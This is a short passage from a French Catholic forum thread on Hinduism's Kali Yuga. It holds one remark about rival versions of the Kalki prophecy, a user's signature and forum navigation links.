
N'oubliez pas qu'il y a deux versions de la Prophétie du Kalki Autar et que la votre est peut-être fausse .


Miles Templi :

Si vous ne savez pas lire mes arguments simples et basiques je ne peux rien faire pour vous comme dirait Halim .

Revenir en haut Aller en bas
Contenu sponsorisé




MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   

Revenir en haut Aller en bas
 
Hindouisme : Le Kali Yuga et l'âge de fer
Revenir en haut 
Page 1 sur 2Aller à la page : 1, 2  Suivant
 Sujets similaires
-
» Kali-Yuga
» Durée de la période "Kali-Yuga" ???
» Le retour du "Carême" grâce au Ramadam des musulmans !
» Les Quatre Yugas
» Baba Vanga...

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE :: Débats avec les religions non-catholiques-
Sauter vers: